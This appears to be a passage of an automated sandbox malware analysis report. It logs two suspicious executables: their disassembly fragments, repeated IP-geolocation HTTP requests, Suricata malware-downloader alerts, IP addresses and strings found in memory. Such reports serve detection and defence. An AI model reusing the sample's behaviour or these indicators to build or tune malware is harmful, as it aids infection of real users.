            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFD5F9h13_2_04EFD350
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B8945h13_2_054B8608
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B0FF1h13_2_054B0D48
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B8001h13_2_054B7D58
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B7BA9h13_2_054B7900
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B5441h13_2_054B5198
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B8459h13_2_054B81B0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B02E9h13_2_054B0040
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B72FAh13_2_054B7050
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B0B99h13_2_054B08F0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B0741h13_2_054B0498
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B7751h13_2_054B74A8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B6A21h13_2_054B6778
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B65C9h13_2_054B6320
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B6E79h13_2_054B6BD0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]13_2_054B33A8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]13_2_054B33B8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B5D19h13_2_054B5A70
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B58C1h13_2_054B5618
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 054B6171h13_2_054B5EC8
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49719 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49725 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49710 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49724 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49715 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49722 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49721 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49717 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49728 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49726 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 104.21.96.1:443
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49713 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49718 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A2B000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.000000000298B000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A74000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002C7A000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A2B000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.000000000297F000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.000000000298B000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.00000000029CE000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A74000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.00000000028C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: hcy2SdW2z6.exe, 00000000.00000002.1236876601.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 00000009.00000002.1277566601.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3639123759.0000000000418000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: svchost.exe, 00000007.00000002.2865477507.0000021188800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: svchost.exe, 00000007.00000003.1208519044.00000211886C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
            Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: svchost.exe, 00000007.00000003.1208519044.00000211886C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: svchost.exe, 00000007.00000003.1208519044.00000211886C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: svchost.exe, 00000007.00000003.1208519044.00000211886FD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A2B000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.00000000029A3000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A74000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002A39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: hcy2SdW2z6.exe, 00000000.00000002.1232948903.00000000030BA000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.00000000028C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: zZlsXaceOG.exe, 00000009.00000002.1274865317.0000000002C2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameh
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: zZlsXaceOG.exe, 0000000D.00000002.3650954724.00000000060F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coa
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239750711.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
